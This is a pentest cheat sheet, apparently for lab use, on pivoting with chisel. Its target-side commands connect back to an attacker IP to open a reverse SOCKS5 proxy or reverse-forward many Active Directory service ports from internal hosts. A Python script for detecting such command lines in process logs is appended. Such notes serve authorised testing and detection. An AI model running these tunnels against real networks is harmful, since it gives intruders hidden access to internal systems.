Prerequisites
- chisel binary on the attack machine.
- chisel.exe (or compatible) on the target/pivot.
- Open port on the attacker to accept incoming tunnels.
Install
git clone https://github.com/jpillora/chisel.git
cd chisel
go build
SOCKS5 Mode (Dynamic Proxy)
Attacker (Server)
chisel server -v -p 1234 --socks5 --reverse
- -p 1234 – listen on port 1234.
- --socks5 – enable SOCKS5 proxy.
- --reverse – expect reverse connections from clients.
Target (Client)
.\chisel.exe client -v 10.10.14.207:1234 R:1080:socks
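- Connects back to 10.10.14.207:1234.
- Exposes a SOCKS5 proxy on local port 1080 of the attacker machine (the listener opens on the chisel server side, and traffic exits from the target).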
Proxychains Configuration for Chisel
Add to the [ProxyList] section of /etc/proxychains.conf:
socks5 127.0.0.1 1080
Tools launched through Proxychains (nmap, msfconsole, firefox, etc.) will now use the Chisel SOCKS proxy.
Specific Port Forwards (More Reliable Than Dynamic)
Attacker (Server)
sudo chisel server -v -p 1234 --reverse
Local Target (services on the pivot itself)
.\chisel.exe client -v 10.10.14.207:1234 R:445:localhost:445 R:88:localhost:88 R:135:localhost:135 R:3268:localhost:3268 R:389:localhost:389 R:636:localhost:636 R:3269:localhost:3269 R:5353:localhost:53 R:464:localhost:464 R:443:localhost:443 R:80:localhost:80 R:5986:localhost:5986 R:123/udp:localhost:123/udp R:139:localhost:139
Remote Target (another host reachable from the pivot)
./chisel_linux client -v 10.10.15.17:1234 R:445:172.16.5.35:445 R:88:172.16.5.35:88 R:135:172.16.5.35:135 R:3268:172.16.5.35:3268 R:389:172.16.5.35:389 R:636:172.16.5.35:636 R:3269:172.16.5.35:3269 R:5353:172.16.5.35:53 R:464:172.16.5.35:464 R:443:172.16.5.35:443 R:5986:172.16.5.35:5986 R:139:172.16.5.35:139 R:5985:172.16.5.35:5985 R:3389:172.16.5.35:3389
This creates reverse port forwards for multiple common Windows/AD services from the pivot back to the attacker.
Use specific forwards when you know which ports/services you care about and want more predictability than a dynamic SOCKS proxy.
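For defenders, the client command lines above have a recognisable argument shape. The following Python sketch is an added example, not part of the original notes or of the chisel project: it parses the R: remotes out of process-creation command lines (such as those recorded by EDR or Sysmon process logging) and summarises the tunnel server, SOCKS use and forwarded targets. The function names and the sample lines are constructed for illustration, and only the remote forms shown on this page are handled.

```python
import re

# Reverse remotes in the forms this page uses: R:<port>:socks and
# R:<port>[/udp]:<host>:<port>[/udp]. Other chisel remote forms are out of scope.
REMOTE_RE = re.compile(
    r"^R:(?P<lport>\d{1,5})(?P<lproto>/(?:tcp|udp))?:"
    r"(?:(?P<socks>socks)|(?P<host>[A-Za-z0-9.\-]+):(?P<rport>\d{1,5})"
    r"(?P<proto>/(?:tcp|udp))?)$"
)
LOOPBACK = {"localhost", "127.0.0.1"}

def parse_reverse_remotes(cmdline):
    """Return (listen_port, target, target_port, proto) per R: argument."""
    found = []
    for tok in cmdline.split():
        m = REMOTE_RE.match(tok.strip("\"'"))
        if not m:
            continue
        if m["socks"]:
            found.append((int(m["lport"]), "socks", None, "tcp"))
        else:
            proto = (m["proto"] or m["lproto"] or "/tcp")[1:]
            found.append((int(m["lport"]), m["host"], int(m["rport"]), proto))
    return found

def assess(cmdline):
    """Summarise a command line that sets up reverse remotes, else None."""
    tokens = cmdline.split()
    remotes = parse_reverse_remotes(cmdline)
    if "client" not in tokens or not remotes:
        return None
    # First bare host:port token is taken to be the tunnel server address.
    server = next((t for t in tokens if re.fullmatch(r"[\w.\-]+:\d{1,5}", t)), None)
    forwards = [r for r in remotes if r[1] != "socks"]
    return {
        "server": server,
        "socks": len(forwards) != len(remotes),
        "forwards": forwards,
        "other_hosts": sorted({r[1] for r in forwards if r[1] not in LOOPBACK}),
    }

# Constructed process command lines (values taken from this page, shortened).
SAMPLE = [
    r".\chisel.exe client -v 10.10.14.207:1234 R:1080:socks",
    "./chisel_linux client -v 10.10.15.17:1234 R:445:172.16.5.35:445 R:3389:172.16.5.35:3389",
    r".\chisel.exe client -v 10.10.14.207:1234 R:5353:localhost:53 R:123/udp:localhost:123/udp",
    "ssh -R 8080:localhost:80 user@host",  # unrelated tool, should not match
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(assess(line))
```

The match is on the argument grammar rather than the executable name, so it applies equally to chisel.exe and chisel_linux as used above.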